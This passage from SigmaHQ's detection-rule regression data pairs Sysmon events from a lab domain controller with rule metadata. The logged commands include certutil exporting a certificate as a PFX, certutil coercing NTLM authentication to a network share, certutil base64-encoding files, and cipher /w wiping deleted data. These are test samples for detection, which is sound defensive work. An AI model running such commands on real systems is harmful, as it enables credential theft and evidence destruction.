    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-25T17:04:22.017117Z\"\n        }\n      },\n      \"EventRecordID\": 11570013,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-25 17:04:22.010\",\n      \"ProcessGuid\": \"5AA13A44-0316-68FD-8535-000000004002\",\n      \"ProcessId\": 3980,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\certutil.exe\",\n      \"FileVersion\": \"10.0.20348.4163 (WinBuild.160101.0800)\",\n      \"Description\": \"CertUtil.exe\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"CertUtil.exe\",\n      \"CommandLine\": \"certutil  -encode file.bat file_.base64\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\Administrator\\\\Downloads\\\\\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\",\n      \"LogonGuid\": \"5AA13A44-568F-68FB-E39A-520000000000\",\n      \"LogonId\": \"0x529ae3\",\n      \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": \"High\",\n      \"Hashes\": \"SHA1=317E563BFC7EC87B181D5A1745E43B8F5288DBFC,MD5=A561A96624CA5CD5491BFC1609E2958A,SHA256=D5B7E8E44F37B1FBD79A79E3321244EEF946F419151374BD1BE4D6833754FED8,IMPHASH=02CB6949ACFAA0B84149D99111C16734\",\n      \"ParentProcessGuid\": \"5AA13A44-0FEC-68FC-281E-000000004002\",\n      \"ParentProcessId\": 6304,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Windows\\\\System32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_certutil_encode/info.yml",
    "content": "id: 70e4269e-9d3c-4bfb-ad84-0b63124ad0a2\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a\n      title: File Encoded To Base64 Via Certutil.EXE\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_certutil_encode/e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_certutil_encode_susp_extensions/ea0cdc3e-2239-4f26-a947-4e8f8224e464.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-25T17:04:22.017117Z\"\n        }\n      },\n      \"EventRecordID\": 11570013,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-25 17:04:22.010\",\n      \"ProcessGuid\": \"5AA13A44-0316-68FD-8535-000000004002\",\n      \"ProcessId\": 3980,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\certutil.exe\",\n      \"FileVersion\": \"10.0.20348.4163 (WinBuild.160101.0800)\",\n      \"Description\": \"CertUtil.exe\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"CertUtil.exe\",\n      \"CommandLine\": \"certutil  -encode file.bat file_.base64\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\Administrator\\\\Downloads\\\\\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\",\n      \"LogonGuid\": \"5AA13A44-568F-68FB-E39A-520000000000\",\n      \"LogonId\": \"0x529ae3\",\n      \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": \"High\",\n      \"Hashes\": \"SHA1=317E563BFC7EC87B181D5A1745E43B8F5288DBFC,MD5=A561A96624CA5CD5491BFC1609E2958A,SHA256=D5B7E8E44F37B1FBD79A79E3321244EEF946F419151374BD1BE4D6833754FED8,IMPHASH=02CB6949ACFAA0B84149D99111C16734\",\n      \"ParentProcessGuid\": \"5AA13A44-0FEC-68FC-281E-000000004002\",\n      \"ParentProcessId\": 6304,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Windows\\\\System32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_certutil_encode_susp_extensions/info.yml",
    "content": "id: 7033fe69-1fd7-4da2-b525-222c1b087107\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: ea0cdc3e-2239-4f26-a947-4e8f8224e464\n      title: Suspicious File Encoded To Base64 Via Certutil.EXE\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_certutil_encode_susp_extensions/ea0cdc3e-2239-4f26-a947-4e8f8224e464.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_certutil_encode_susp_location/82a6714f-4899-4f16-9c1e-9a333544d4c3.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-25T17:05:11.334152Z\"\n        }\n      },\n      \"EventRecordID\": 11585346,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-25 17:05:11.327\",\n      \"ProcessGuid\": \"5AA13A44-0347-68FD-8B35-000000004002\",\n      \"ProcessId\": 6780,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\certutil.exe\",\n      \"FileVersion\": \"10.0.20348.4163 (WinBuild.160101.0800)\",\n      \"Description\": \"CertUtil.exe\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"CertUtil.exe\",\n      \"CommandLine\": \"certutil  -encode C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\Microsoft\\\\Network\\\\sr011.xml C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\Microsoft\\\\Network\\\\conv.xml\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\Administrator\\\\Downloads\\\\\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\",\n      \"LogonGuid\": \"5AA13A44-568F-68FB-E39A-520000000000\",\n      \"LogonId\": \"0x529ae3\",\n      \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": \"High\",\n      \"Hashes\": \"SHA1=317E563BFC7EC87B181D5A1745E43B8F5288DBFC,MD5=A561A96624CA5CD5491BFC1609E2958A,SHA256=D5B7E8E44F37B1FBD79A79E3321244EEF946F419151374BD1BE4D6833754FED8,IMPHASH=02CB6949ACFAA0B84149D99111C16734\",\n      \"ParentProcessGuid\": \"5AA13A44-0FEC-68FC-281E-000000004002\",\n      \"ParentProcessId\": 6304,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Windows\\\\System32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_certutil_encode_susp_location/info.yml",
    "content": "id: bfbc8981-818e-4de5-b7a4-1bb3d4a08792\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 82a6714f-4899-4f16-9c1e-9a333544d4c3\n      title: File In Suspicious Location Encoded To Base64 Via Certutil.EXE\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_certutil_encode_susp_location/82a6714f-4899-4f16-9c1e-9a333544d4c3.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_certutil_export_pfx/3ffd6f51-e6c1-47b7-94b4-c1e61d4117c5.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-25T17:23:42.049726Z\"\n        }\n      },\n      \"EventRecordID\": 11818106,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-25 17:23:42.043\",\n      \"ProcessGuid\": \"5AA13A44-079E-68FD-0236-000000004002\",\n      \"ProcessId\": 2456,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\certutil.exe\",\n      \"FileVersion\": \"10.0.20348.4163 (WinBuild.160101.0800)\",\n      \"Description\": \"CertUtil.exe\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"CertUtil.exe\",\n      \"CommandLine\": \"certutil  -p secret_password -exportPFX root 1c6119aff8414c91487c4e02d18dd73D c:\\\\cert.pfx\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\Administrator\\\\Downloads\\\\\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\",\n      \"LogonGuid\": \"5AA13A44-568F-68FB-E39A-520000000000\",\n      \"LogonId\": \"0x529ae3\",\n      \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": \"High\",\n      \"Hashes\": \"SHA1=317E563BFC7EC87B181D5A1745E43B8F5288DBFC,MD5=A561A96624CA5CD5491BFC1609E2958A,SHA256=D5B7E8E44F37B1FBD79A79E3321244EEF946F419151374BD1BE4D6833754FED8,IMPHASH=02CB6949ACFAA0B84149D99111C16734\",\n      \"ParentProcessGuid\": \"5AA13A44-0FEC-68FC-281E-000000004002\",\n      \"ParentProcessId\": 6304,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Windows\\\\System32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_certutil_export_pfx/info.yml",
    "content": "id: 387ea4f5-f74d-4b14-a1a7-db8c97fb56c2\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 3ffd6f51-e6c1-47b7-94b4-c1e61d4117c5\n      title: Certificate Exported Via Certutil.EXE\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_certutil_export_pfx/3ffd6f51-e6c1-47b7-94b4-c1e61d4117c5.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_certutil_ntlm_coercion/6c6d9280-e6d0-4b9d-80ac-254701b64916.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-25T17:26:24.815458Z\"\n        }\n      },\n      \"EventRecordID\": 11867155,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-25 17:26:24.808\",\n      \"ProcessGuid\": \"5AA13A44-0840-68FD-1336-000000004002\",\n      \"ProcessId\": 4424,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\certutil.exe\",\n      \"FileVersion\": \"10.0.20348.4163 (WinBuild.160101.0800)\",\n      \"Description\": \"CertUtil.exe\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"CertUtil.exe\",\n      \"CommandLine\": \"certutil  -syncwithWU \\\\\\\\10.0.1.14\\\\my-share\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\Administrator\\\\Downloads\\\\\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\",\n      \"LogonGuid\": \"5AA13A44-568F-68FB-E39A-520000000000\",\n      \"LogonId\": \"0x529ae3\",\n      \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": \"High\",\n      \"Hashes\": \"SHA1=317E563BFC7EC87B181D5A1745E43B8F5288DBFC,MD5=A561A96624CA5CD5491BFC1609E2958A,SHA256=D5B7E8E44F37B1FBD79A79E3321244EEF946F419151374BD1BE4D6833754FED8,IMPHASH=02CB6949ACFAA0B84149D99111C16734\",\n      \"ParentProcessGuid\": \"5AA13A44-0FEC-68FC-281E-000000004002\",\n      \"ParentProcessId\": 6304,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Windows\\\\System32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_certutil_ntlm_coercion/info.yml",
    "content": "id: 32397458-1d93-45ee-a3c8-9efebb81d9d1\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 6c6d9280-e6d0-4b9d-80ac-254701b64916\n      title: Potential NTLM Coercion Via Certutil.EXE\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_certutil_ntlm_coercion/6c6d9280-e6d0-4b9d-80ac-254701b64916.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_chcp_codepage_lookup/7090adee-82e2-4269-bd59-80691e7c6338.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-25T17:27:26.975358Z\"\n        }\n      },\n      \"EventRecordID\": 11886324,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-25 17:27:26.974\",\n      \"ProcessGuid\": \"5AA13A44-087E-68FD-1A36-000000004002\",\n      \"ProcessId\": 6788,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\chcp.com\",\n      \"FileVersion\": \"10.0.20348.1 (WinBuild.160101.0800)\",\n      \"Description\": \"Change CodePage Utility\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"CHCP.COM\",\n      \"CommandLine\": \"chcp\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\Administrator\\\\Downloads\\\\\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\",\n      \"LogonGuid\": \"5AA13A44-568F-68FB-E39A-520000000000\",\n      \"LogonId\": \"0x529ae3\",\n      \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": \"High\",\n      \"Hashes\": \"SHA1=0489A9D0B4342F9C87C03510E0073898864946A5,MD5=0714C0100E008D00EC82E7B549595F69,SHA256=A807B535F7176642FC87911D185C10B00981388CDA68F5B8E2FF4C73FF514352,IMPHASH=75FA51C548B19C4AD5051FAB7D57EB56\",\n      \"ParentProcessGuid\": \"5AA13A44-087E-68FD-1936-000000004002\",\n      \"ParentProcessId\": 8248,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"cmd.exe  /c chcp\",\n      \"ParentUser\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_chcp_codepage_lookup/info.yml",
    "content": "id: 30e3935a-84b4-45ad-85e2-c209c57dbfa7\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 7090adee-82e2-4269-bd59-80691e7c6338\n      title: Console CodePage Lookup Via CHCP\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_chcp_codepage_lookup/7090adee-82e2-4269-bd59-80691e7c6338.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_chcp_codepage_switch/c7942406-33dd-4377-a564-0f62db0593a3.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-25T17:28:28.958645Z\"\n        }\n      },\n      \"EventRecordID\": 11905446,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-25 17:28:28.957\",\n      \"ProcessGuid\": \"5AA13A44-08BC-68FD-2336-000000004002\",\n      \"ProcessId\": 8208,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\chcp.com\",\n      \"FileVersion\": \"10.0.20348.1 (WinBuild.160101.0800)\",\n      \"Description\": \"Change CodePage Utility\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"CHCP.COM\",\n      \"CommandLine\": \"chcp  936\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\Administrator\\\\\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\",\n      \"LogonGuid\": \"5AA13A44-568F-68FB-E39A-520000000000\",\n      \"LogonId\": \"0x529ae3\",\n      \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": \"High\",\n      \"Hashes\": \"SHA1=0489A9D0B4342F9C87C03510E0073898864946A5,MD5=0714C0100E008D00EC82E7B549595F69,SHA256=A807B535F7176642FC87911D185C10B00981388CDA68F5B8E2FF4C73FF514352,IMPHASH=75FA51C548B19C4AD5051FAB7D57EB56\",\n      \"ParentProcessGuid\": \"5AA13A44-08B2-68FD-2136-000000004002\",\n      \"ParentProcessId\": 3204,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_chcp_codepage_switch/info.yml",
    "content": "id: a67c0d0c-3b40-4fef-a39d-5bd528255d90\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: c7942406-33dd-4377-a564-0f62db0593a3\n      title: Suspicious CodePage Switch Via CHCP\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_chcp_codepage_switch/c7942406-33dd-4377-a564-0f62db0593a3.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_cipher_overwrite_deleted_data/4b046706-5789-4673-b111-66f25fe99534.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-25T17:32:06.432272Z\"\n        }\n      },\n      \"EventRecordID\": 11973062,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-25 17:32:06.421\",\n      \"ProcessGuid\": \"5AA13A44-0996-68FD-3A36-000000004002\",\n      \"ProcessId\": 2876,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\cipher.exe\",\n      \"FileVersion\": \"10.0.20348.1 (WinBuild.160101.0800)\",\n      \"Description\": \"File Encryption Utility\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"CIPHER.EXE\",\n      \"CommandLine\": \"cipher.exe  /w:C:\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\Administrator\\\\Downloads\\\\\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\",\n      \"LogonGuid\": \"5AA13A44-568F-68FB-E39A-520000000000\",\n      \"LogonId\": \"0x529ae3\",\n      \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": \"High\",\n      \"Hashes\": \"SHA1=5747F6E48C899AEE54E4153AC8A8B61E741F45E2,MD5=3D7D3EEDD055EFF0C7995491466A7EB7,SHA256=6E04AD8A79A7D794438E197606AB78B079929D941FE99DD5159702694F7ACE77,IMPHASH=E83B4C457AFD5EEA31874B00E8A3A956\",\n      \"ParentProcessGuid\": \"5AA13A44-0FEC-68FC-281E-000000004002\",\n      \"ParentProcessId\": 6304,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Windows\\\\System32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_cipher_overwrite_deleted_data/info.yml",
    "content": "id: 18b75b44-f2a5-497f-934c-9d0941f57f0f\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 4b046706-5789-4673-b111-66f25fe99534\n      title: Deleted Data Overwritten Via Cipher.EXE\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_cipher_overwrite_deleted_data/4b046706-5789-4673-b111-66f25fe99534.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_clip_execution/ddeff553-5233-4ae9-bbab-d64d2bd634be.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-25T17:33:00.990279Z\"\n        }\n      },\n      \"EventRecordID\": 11989935,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-25 17:33:00.989\",\n      \"ProcessGuid\": 